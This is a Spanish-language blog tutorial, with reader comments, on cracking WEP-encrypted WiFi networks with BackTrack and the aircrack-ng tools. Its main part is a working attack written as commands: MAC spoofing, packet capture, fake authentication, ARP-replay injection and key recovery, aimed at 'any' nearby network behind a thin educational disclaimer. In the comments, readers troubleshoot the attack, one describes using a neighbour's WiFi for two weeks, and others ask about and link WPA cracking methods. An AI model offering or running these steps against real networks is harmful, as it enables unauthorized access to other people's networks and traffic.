Cómo crackear las redes WiFi usando BackTrack

La semana pasada les informaba que BackTrack 5 ya estaba disponible para ser descargado. Además les expliqué cómo instalarlo y cómo arrancar tu computadora con el Live CD de BackTrack 5. Pues bien, el día de hoy les traigo una guía paso a paso que les permitirá crackear cualquier red WiFi con encriptación WEP activada usando BackTrack.

Nota: El conocimiento es poder, pero el poder no significa que debes ser un idiota, ni que debas hacer nada ilegal. Saber abrir una cerradura no te hace un ladrón. Este post está hecho con fines meramente educativos.

Como dije anteriormente, usaremos BackTrack 5, aunque da lo mismo que versión de BackTrack utilices, el procedimiento es el exactamente el mismo.

Lo que necesitas:

- Un Live CD de BackTrack.
- Un adaptador o tarjeta de red con capacidad de inyección de paquetes.
- Una red WiFi cercana.

Lo primero de todo es arrancar tu ordenador usando BackTrack, preferiblemente en modo gráfico. Si no sabes cómo, puedes verlo aquí.

Paso 1. Debes abrir una ventana de la terminal o consola y escribir el siguiente comando:

airmon-ng

El comando anterior te dirá cual es tu tarjeta inalámbrica, lo nombres más comunes son wlan0, ra0, eth0 ó eth1, cosas asi por el estilo. Te darás cuenta de cual es nombre de tu adaptador de red. Anota el nombre en un papel.

Paso 2. El siguiente paso es cambiar la MAC de tu ordenador. Para ello debes introducir el siguiente comando:


airmon-ng stop (tarjeta de red)
ifconfig (tarjeta de red) down
macchanger --mac 00:11:22:33:44:55 (tarjeta de red)
airmon-ng start (tarjeta de red)

Si tu tarjeta de red se llama wlan0, entonces los comandos serían:


airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0

Si se llama eth0, entonces sería:


airmon-ng stop eth0
ifconfig eth0 down
macchanger --mac 00:11:22:33:44:55 eth0
airmon-ng start eth0

Dondequiera que veas (tarjeta de red) debes reemplazarlo con el nombre de tu tarjeta de red. Nosotros hemos usado la MAC 00:11:22:33:44:55, pero tú puedes usar cualquiera que se te ocurra.

Paso 3. El siguiente comando te permitirá ver cuáles son las redes WiFi que hay a tu alrededor.

airodump-ng (tarjeta de red)

Va a salir una lista con todas las redes inalambricas alrededor, donde dice el BSSID (MAC del router que da la señal), PWR (Poder de señal), CHN (Canal en que se encuentra la red), ENC (Es el tipo de encriptación) y ESSID (Nombre de la red inalambrica).

Cuando veas la red que deseas crackear, pulsa Ctrl + C para detener la lista. Resalta la fila perteneciente a la red de interés, y tomar nota de dos cosas: su BSSID y su canal (en la columna CH), como se ilustra a continuación. Es evidente que la red que desea crackear debe tener cifrado WEP (en la columna ENC), no debe tener WPA, ni ninguna otra cosa.

Paso 4. Ahora vamos a ver lo que está pasando con la red que hayas eligido y capturar esa información en un archivo.

airodump-ng -c (canal) -w (nombre del archivo) --bssid (bssid) (tarjeta de red)

Supongamos que la red que deseas crackear está en en canal 1, que deseas nombrar el archivo como ‘prueba’ y que el bssid es 00:00:00:00:00:00 y que tu tarjeta de red es wlan0, entonces el comando sería:

airodump-ng -c 1 -w prueba --bssid 00:00:00:00:00:00 wlan0


Ahora ya estas capturando datos, ahora fíjate que hay una columna que dice DATA, estos son los paquetes que llevas capturados, para poder descifrar la clave WEP como mínimo debes capturar unos 20,000 paquetes. Yo recomiendo 30,000.

Notarás que puede ir muy lento, esto significa que ninguna persona esta utilizando la red en el momento. Entonces no esta generando trafico y te podria llevar demasiado tiempo llegar a los 20,000 paquetes. Por suerte tu mismo puedes inyectarle tráfico a la red y para eso es el comando siguiente.

Paso 5. Abre una nueva ventana de la consola y escribe el siguiente comando:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (tarjeta de red)

-a es el bssid de la red que estamos atacando
-h es la mac falsa que le diste a tu tarjeta de red al principio
-e es el nombre de la red que estamos atacando

Después de introducir el comando deberían aparecer 4 lineas de codigos y la final debe decir que la conexion ha sido exitosa (“Association successful”), esto significa que estas conectado en capa 2 del router de la red que estás atacando.

Si por alguna razón no te puedse conectar, entonces las causas pueden ser las siguientes:

-La red que quieres atacar esta muy lejos.
-Tu tarjeta de red no puede hacer inyeccion de paquetes.
-El router que quieres atacar tiene seguridad para evitar este tipo de ataques.

Paso 6. Ahora para inyectarle el tráfico introducce el siguientes comando:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (tarjeta de red)

Donde:
-b es el bssid de la red que estamos atacando.
-h es la MAC falsa que le dimos a tu tarjeta de red inalámbrica.

Verás que que se empezaran a inyectar paquetes, si vas a ver a la otra terminal donde estás capturando los paquetes te darás cuenta que la columna de DATA ahora avanzará mucho más rápido.

Dependiendo de la potencia de la red que estés atacando este proceso podría tomar algún tiempo. Es cuestión de que dejes el ordenador trabajar y vayas a dar una vuelta hasta que data llegue a 20,000 paquetes.

Paso 7. Una vez que hayas recopilado datos suficientes, es el momento de la verdad. Abre una tercera ventana de la consola y ejecuta el siguiente comando para recuperar que los datos que hemos recogido:

aircrack-ng -b (bssid) (nombre de archivo-01.cap)

Aquí el nombre del archivo debe ser el que escribiste más arriba. Debes ir al escritorio para verlo, es el que tiene la extensión .cap.

Si no has recopilado suficientes datos, aircrack presentará un error y te dirá que vuelvas a intentarlo con más datos. Si tienes éxito, se verá así:

La clave WEP aparece al lado del mensaje “Key Found”. Esto significa que la contraseña se ha descifrado. Puedes copiarla y usarla para conectarte a esa red cuando quieras.

Fuente



67 pensamientos en “Cómo crackear las redes WiFi usando BackTrack

  1. Bueno muy buen aporte pero la pregunta que tengo es que, en mi caso el programa sigue inyectando paquetes y nunca finaliza que puedo hacer

    denuevo gracias por tan valioso aporte….

  2. una pregunta al insertar (escribir el comando) airmon-ng me sale interfaz chip y driver pero no con las especificaciones reuqeridas para el siguiente paso (no me muestra la marca de mi tarjeta wireless)

  3. por que cuando corro el text mode y luego le pongo startx no me sale la interfaz, la pantalla se queda como una consola en pantalla completa… por favor ayuda

  4. Hola, buen tutorial aunque le falta algo de detalle y en algunas instrucciones faltan guiones, nada grave. Mi duda es ya que obtuve la pantalla de KEY FOUND! ¿la clave que tengo que poner al entrar a la red wifi son todos los números sin los dos puntos que lo separan? o ¿eso hay que codificarlo o buscar en otro archivo? pregunto porque lo intenté con los números y no me pude conectar a la red de todos modos.

    • Debes poner los números tal cual te aparecen, pero sin los puntos. En algunas versiones de BackTrack también he visto que la clave te la da en formato numérico para que tú la conviertas a su valor equivalente en ASCII. Si gustas escribe el valor aquí y te diré su equivalente.

      Respecto a los guiones, he notado que por alguna razón en el editor me aparecen los dos guiones, pero en el sitio se ve como si fuera un sólo guión largo. Ya lo corregí dando un espacio extra, pero en realidad son dos guiones seguidos, tal y como se muestra en las imágenes.

      • oye me dio como resultado

        [31:08:73:17:64]

        ingreso los numeros tal cual estan y me dice que esta demorando demasiado….. si los convierto a ascii por las herramientas que encontre en google me dice que el 08 es backspace… entonces no se que hacer te agradesco si me colaboras :D

  5. hola amigo fijate que e estado leendo tu tutorial pero tengo un problema que cuando le doy a que encuentre redes solo me aparece OPN que puedo hacer como hago para sacarle la constraseña e leido que los datos de esta red no estan desifrados si no que viajan al aire libre que puedo hacer alguien qeu me ayude por favor gracias

  6. ok amigos, 1° alejandro si te sale nadamás el nombre del chipset y algunos detalles de tu pc, quiere decir que tu antena no es compatible para hacer cracking a la red wireless.
    En el caso de pipo, lo que pasa es que la red que intentas crackear no está en operación el modem, es decir, que nadie está usando por el momento la red, para esto tienes que tener paciencia o en su defecto, buscar otra red que te arroje datos.

    • Lo primero es estar seguro que tu tarjeta de red tiene capacidad de inyección de paquetes. Luego asegúrate qué no estás muy lejos de la red a la que estás intentando conectarte, si estás lo suficientemente cerca entonces prueba con otra red, ya que es probable que esa red tenga protección contra este tipo de ataques.

  7. hola saludos usé bactrack 5 dice hey found coloque el codigo para entrar en la red sinlos dos puntos aun asi no se conecta a la red que es lo que suced.. la key que me salio fue EB:03:07:08:0C lo puse sin los puntos EB0307080C que sucede.

    • Pues esa es la clave, pero debes convertirla a formato ASCII. Si no me equivoco, esos caracteres equivalen a lo siguiente: ?????. Prueba introduciendo esos cinco signos de cierre de pregunta.

  8. Gracias pero agregue los signos de interrogacion y no funciono. pero alli mismo en backtrack
    introuje la clave con otra encriptacion shared y si entro…pero quiero entrar desde windows y con esa clave no puedo como la decifro.

  9. Holasm hice todos los pasos y rula perfectamente, pero no me krea ningun archivo .cap en el desktop, ya probe de varias maneras y nada, spero puedan ayudarme….

  10. hola perdona mi ignorancia, pero sera que me pueden ayudar, instale el BT5 pero no me reconoce la tarjeta inalambrica del notebook, soy novato en estos temas, me pueden recomendar algun tutorail para instalacion de hardware en linux, la tarjeta es una intel 2200BG, muchas gracias….

  11. Pingback: Hackea las claves Wi-Fi desde tu iPhone con iWep Pro v4.0.6. | Applediario

  12. Hola Domadis, tengo un problema, tanto en backtrack 5 como ubuntu 10.4 me sale lo siguiente

    sondopae@sondopae-desktop:~$ airmon-ng

    Interface Chipset Driver

    wlan0 RTL8187 rtl8187 – [phy0]

    sondopae@sondopae-desktop:~$ sudo airmon-ng stop wlan0

    Interface Chipset Driver

    wlan0 RTL8187 rtl8187 – [phy0]
    (monitor mode disabled)

    root@sondopae-desktop:/home/sondopae# ifconfig wlan0 down
    root@sondopae-desktop:/home/sondopae# macchanger – -mac 00:11:22:33:44:55 wlan0
    set device name: No such device

    Me faltará algún paquete, por favor ayuda.

    • No, por lo que me copias el error está en el comando, si te fijas estás usando un guión largo y luego uno corto antes de poner la mac falsa, prueba con dos guiones cortos seguidos.

  13. Si es cierto, lo que pasa que sòlo lo copiè y peguè, oye es normal que aparezca lo siguiente?
    root@bt:~# airmon-ng start wlan0

    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    968 dhclient3
    1520 dhclient3
    Process with PID 1520 (dhclient3) is running on interface wlan0

    Interface Chipset Driver

    wlan0 Realtek RTL8187L rtl8187 – [phy0]
    (monitor mode enabled on mon0)

  14. Oye hermano, me fijado que busca un equipo conectado a esa red, pero despuès de cierto tiempo desaparece, vuelvo a iniciar el proceso en la segunda ventana y lo encuentra y muestra màs paquetes, me imagino que es relacionado con el mensaje que te enviè hace un rato, còmo puedo evitar que dejen de funcionar esos procesos.
    por cierto con Beini mi tarjeta crakea bien, es decir, la tarjeta si inyecta es una alfa.

  15. OYE DOMADIS, TE COMENTO… AL EJECUTAR EL COMANDO airmon-ng NO ME ARROJA EL NOMBRE DE MI TARJETA INALAMBRICA, ME APARECE:
    Interface chipset driver
    nadamás eso aparece…
    dime qué puedo hacer porfavor…
    de antemano gracias, muy buen aporte…

  16. ELIELZS a mi me pasaba lo mismo, pero el problema era que mi tarjeta no inyectaba paquetes, lo había intentado con el Backtrack y con Beini y con los dos pasaba lo mismo, si te sirve mi comentario creo que es tu paquete que no tiene compatibilidad para inyectar paquetes.
    Saludos.

  17. Muy buen aporte men gracias….. una pregunta..? este programa o mejor dicho distribucion de GNU/Linux, sirve solo para desencriptar o encontrar las claves de redes wifi con seguridad WEP, o tambien hay manera de decifrar claves con seguridad WPA, WPA2…? y si es el caso de que se puede….me puedes indicar como….son los mismos pasos que indicas o se deben modificar por otros…??? y por cierto para los que cogieron el entorno GNOME del backtrack si les pide una clave de acceso para activar el entorno grafico es:
    passwd:toor
    login:root
    espero les sirva y que alguien me indique….lo que les comento…gracias…saludos a todos.

    • oie Elielzs…a mi me pasa lo mismo k te paso de k no me arrojaba el nombre de mi tarjeta….¿pudiste arreglar tu problema….y si es asi…me podrias decir como?

      salu2

  18. Edgar, esperemos que domadis nos ayude con algún proceso, yo tengo algunos pasos para WPA2, y funcionan, pero se necesita un diccionario en español de preferencia, ya que la clave en WPA2 puede ser de 8 a 63 caracteres y lo que hace el aircrack es probar las 227 millones de palabras del diccionario que tengas contra el Handshake que se obtiene de los paquetes, el problema es que si tu pones en tu router una contraseña en español como “Juancamaneybiensabroso0202″ pues nunca se va a encontrar si el diccionario tiene sólo palabras en ingles como “iwannarock” o cosas así, esperemos que el buen domadis pueda ayudarnos un poco, de lo contrario voy a tratar de compilar los pasos que yo mismo ejecute y se los posteo, pero quedamos en manos de domadis.

  19. edgar, te comparto este enlace, es de otro sitio, pero te darà una idea, lo malo de las WPA2 es que son complicadas de sacar la contraseña, debes intentar con varios metodos al descifrar la clave, hay algunos como este con Crunch otro como el John the ripper o aircrack, la verdad WPA2 es un proceso al que todavìa se intenta encontrar el hilo negro al descifrar, puedes tener el handshake, el problema es descifrar, te dejo el enlace para que te empieces a entretener, yo cambie mi mac y escanee las redes como indica domadis, luego instale el crunch como se indica en el siguiente enlace si tienes dudas me avisas.
    http://www.taringa.net/posts/linux/6123053/Romper-WPA-y-WPA2-con-crunch.html

    • Que tal Servine saludos, mira te cuento estoy probando este proceso de hackeo en una portatil COMPAQ C762NR Notebook PC, la cual tiene una tarjeta WIFI Atheros AR2425, pero el problema es que sigo los pasos todo bien hasta el paso 3, es ahi donde tengo problemas, es decir cuando ya cambio la MAC, y reinicio los servicios con el airmon-ng start wlan0 me aparece el siguiente informe:

      Found 2 processes that could cause trouble.
      If airodump-ng, aireplay-ng or airtun-ng stops working after
      a short period of time, you may want to kill (some of) them!

      PID NAME
      2169 dhclient3
      2233 dhclient3
      Process with PID 2233 (dhclient) is running on interface wlan0

      Interface Chipset Driver
      wlan0 Atheros AR2425 ath5k -[phy0] SI0CSIFFLAGS: Unknow error 132
      (monitor mode enabled on mon0)

      Ahora como ves en esta linea me dice lo siguiente:
      wlan0 Atheros AR2425 ath5k -[phy0] SI0CSIFFLAGS: Unknow error 132
      por tanto me arroja el error que como es de saber no me deja realizar los siguientes pasos. ya que para averiguar algo más de información sobre nuestras redes WIFI quiero scanear las ondas de radio con el comando airodump-ng mon0 y me sale este error:
      ioctl(SI0CSIFFLAGS) failed: Unknown error 132, el mismo de filas anteriores que les comentaba…porfavor me pueden decir a que se debe este error… sera por que mi tarjeta no tiene capacidad de Inyeccion de paquetes…. tal vez alta instalar el controlador para esa tarjeta WIFI Atheros AR2425…. o que sucede…porfavor si me puedes asesorar con este problema…
      desde ya muchas gracias….
      saludos
      Att:Edgar

  20. disculpa tengo un poroblema al seleccionar modo grafico al ejecutar BT5 en modo Live, despues de teclear startx y al cargar los componentes me pone error y vuelve a la linea de comando… en este caso que puedo hacer?

  21. Hola a todos les pido me ayuden en lo siguiente Gracias:
    Mira te cuento estoy probando este proceso de hackeo en una portatil COMPAQ C762NR Notebook PC, la cual tiene una tarjeta WIFI Atheros AR2425, pero el problema es que sigo los pasos todo bien hasta el paso 3, es ahi donde tengo problemas, es decir cuando ya cambio la MAC, y reinicio los servicios con el airmon-ng start wlan0 me aparece el siguiente informe:

    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID NAME
    2169 dhclient3
    2233 dhclient3
    Process with PID 2233 (dhclient) is running on interface wlan0

    Interface Chipset Driver
    wlan0 Atheros AR2425 ath5k -[phy0] SI0CSIFFLAGS: Unknow error 132
    (monitor mode enabled on mon0)

    Ahora como ves en esta linea me dice lo siguiente:
    wlan0 Atheros AR2425 ath5k -[phy0] SI0CSIFFLAGS: Unknow error 132
    por tanto me arroja el error que como es de saber no me deja realizar los siguientes pasos. ya que para averiguar algo más de información sobre nuestras redes WIFI quiero scanear las ondas de radio con el comando airodump-ng mon0 y me sale este error:
    ioctl(SI0CSIFFLAGS) failed: Unknown error 132, el mismo de filas anteriores que les comentaba…porfavor me pueden decir a que se debe este error… sera por que mi tarjeta no tiene capacidad de Inyeccion de paquetes…. tal vez alta instalar el controlador para esa tarjeta WIFI Atheros AR2425…. o que sucede…porfavor si me puedes asesorar con este problema…
    desde ya muchas gracias….
    saludos
    Att:Edgar

  22. ESTA SUPER BUENO EL POST PERO TENGO UNA PREGUNTA LA RED QUE QUIERO ATACAR ES UNA RED WPA PERO CUANDO INTECTO INYECTAR LOS PAQUETES ME INICA ESTE ERROR

    CH 1 ][ Elapsed: 11 mins ][ 2011-12-28 09:21 ][ fixed channel mon0: -1

    -a 00:00:00:00:00:00 -h 00:11:22:33:44:55 mon0
    11:10:30 Waiting for beacon frame (BSSID: 00:00:00:00:00:00) on channel -1
    11:10:30 mon0 is on channel -1, but the AP uses channel 1

    siempre me manda este mensaje…. y hasta ahi donde llego…
    espero una respuesta….. GRACIAS……. ESOY DESESPERADO Y MI TARJETA ES UNA d-LINK dwl-ag530 ESPERO ME PUEDAN AYUDAR GRACIAS MI CORREO ES ACPYRJK@HOTMAIL.COM AYUDAAAAAAAAAAAA XFAVORRRRRRRRRR

  23. LA VERDAD A MI NO ME GUSTA LINUX Y TALVEZ JAMAS ME GUSTE PERO LO QUE EXPLICAS AQUI ES COMO APRENDER A USAR EL TELEFONO O LA TELE Y SI ALGUN DIA APRENDEMOS LOS CONCEPTOS BASICOS DE LAS COMUNICACIONES EN VERDAD QUE NO TENDREMOS QUE PAGAR POR SERVICIOS TAN SIMPLES NECESARIOS Y MONOPOLISADOS EN GENERAL GRACIAS POR EL POST PD ERES MI ERUE JAJA

  24. si el programa solo sirve para decifrar claves WEP no sirve para nada porque En la actualidad casi todo el mundo usa o WAP o WPA2 responde si sirve tambien para esas otras formas de segurida

  25. Pingback: Cómo crackear las redes WiFi con contraseña WPA usando Reaver |

  26. no crea ningun archivo… para guardar

    Paso 4. Ahora vamos a ver lo que está pasando con la red que hayas eligido y capturar esa información en un archivo.
    airodump-ng -c (canal) -w (nombre del archivo) – -bssid (bssid) (tarjeta de red)

    al usar
    aircrack-ng-b (bssid) (nombre de archivo-01.cap)

    me dice q no existe (si es el mismo q cree en el paso 4).

    uso modo livecd, no instalo. no aparece nada en el escritorio.

    por que?

  27. hola quisiera saber como se hace, tengo wifi encore 802.11g externo, con este se puede hackear y como se hace??
    si no, cual debo tener que pueda adapatar a un pc de escritorio

  28. Estimados,

    A mi me resulto todo el proceso, luego de 2 semanas que use la señal WIFI de mi vecino, ahora ya no puedo pues me sale el icono de la señal completa pero con un signo de exclamacion, y esta con la clave correcta y todo, q crees q pudo haber pasado?? Gracias

  29. Buenas, excelente post, tengo un pregunta cuandop inserto el comando airodump-ng wlan0 me aparece lo siguente
    ioctl (SIOCSIFFLAGS) failed: unknown error 132
    ¿que es ese error?

  30. El metodo utilizado esta genial, mil gracias, pero para principiantes que utilizan el BACKTRACK 5, se puede hacer mucho mas fácil y simplificado este procedimiento, se los puedo pasar en un archivo pdf, si me contactan por twitter a @Braulio_Mendoza

  31. hola, tengo el bt 4, y cuando pongo el iwconfig, me aparecen trtes nombres de tarjetas, y la que me sirve, es una de esas , y puedo trabajar con ella, pero no es la mia , en realidad mi tarjeta es wlan0, 802 bgn, mi pregunta es: esa tarjeta que sale ahi, es la que esta generando la señal a la cual yo estoy asociado? o mejor dicho “colgado” gracias

  32. oye una pregunta yo hice todo eso pero al final me salio la clave haxagesimal con letras y numeros
    como podria convertirlo a ascii , tendras el nombre de algun programa convertidor talvez , te lo agradeceria
    y otra pregunta puse esa misma clave (hesagesimal) para conectarme en windows ; es cierto se conecta pero no navega por internet ¿que es lo que pasa?
    es por el formato de clave que le puse talves?

  33. Hola, tengo instalado el bt 5, completo el paso 4 y cuando llegó al paso 5 no se cómo abrir una nueva ventana de la terminal, cómo lo hago? Discúlpen mi ignorancia, gracias

  34. GRACIAS por el tutorial.

    He hecho todos los pasos y todo perfecto! Excepto que nunca consigo ver a nadie más conectado al router “atacado” excepto a mi mismo.

    Estoy haciendo las pruebas con un router propio, y una vez hechos todos los pasos conecto un par de ordenadores al router “atacado” pero nada, no los detecta, no lee los paquetes ACK y por lo tanto reinyecta nada

    ¿Sabes por que puede ser?

  35. Oie una duda, que no sale por los malandros de aka, realizamos todo a buen paso pero al momento del escaneo inmon-ng comienza el escaneo pero no detecta redes inclusive la mia a un lado del modem… kreemos que es por que la tarjeta de red o no sabemos, por si ayuda es una Macbook mas omenos del 2008-2009 no recuerd el modelo…alguna suguerencia?

  36. Pingback: Cómo hackear redes WiFi y obtener las contraseñas WPA2-PSK con Cowpatty |

  37. Tengo una duda, cuando voy a ejecutar el aircrack ya para abrir mi archivo, me analiza los paquetes pero me sale “tesed 531 keys (go to 1238 IVs) y me sale una tabla con 3 columnas y letras y numeros en parentesis, he capturado 40.752, y como estoy en live ya se me esta ocupando ek espacio, que puedo hacer???

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos necesarios están marcados *

Puedes usar las siguientes etiquetas y atributos HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>